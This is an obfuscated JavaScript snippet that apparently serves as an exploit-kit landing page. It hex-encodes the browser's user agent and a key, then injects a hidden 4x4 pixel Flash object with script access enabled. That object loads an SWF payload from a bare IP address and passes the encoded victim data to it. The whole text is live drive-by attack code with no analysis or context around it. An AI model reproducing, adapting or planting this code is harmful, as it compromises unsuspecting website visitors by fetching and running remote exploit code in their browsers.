/*s86660d45288hssfj9910fs*/function hgfgerdfgdf(num, width){/*s39339d70892hfj30249fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s7915d50096hfj24137fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s87033d66378hfj98247fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s18530d59153hfj72370fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd44439hfs*/c += b + d;/*s97243d7575hfj40961fs*/e += 1;}return c;}/*s70507dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.77.39/?NjY2MTUyMjg=&elsa=Rpm49aAFgbpaiujUOBnReUh5aB_xeNYAhA-ZOWHLM7i1z2m7ATc8pxzhSL6mMByOgtU1sY4wsVrKyIUaCf&info=MjY0MzI1NDc=&rand=xHzQMrPYbR7FFYPfKPnEUKREMU3WA0eKwY-ZhazVF5-xFDfGpbH1Fx_spVydCFyEmvJvdLAHIwGh1UTASw&fore=MzY2MTYxMzM=", ghnvbn("http://188.225.77.39/?NjIxNDg3NzQ=&info=MzkxNDQyMjQ=&rand=xXzQMvWdbRXQC53EKvrcT6NEMVHRHECL2YydmrHQefjaeVWkzrLFTF_xozKASASG6_JtdfJSDQ&elsa=vmj0LScwcznI1cBg4b9q6tjEDVyBOdhpSK_BXeYggR-JGXQrgy2V6ky7AkccklwxKF61ENjOse&arnd=NTE5OTA4OTQ=","wexykukusw"));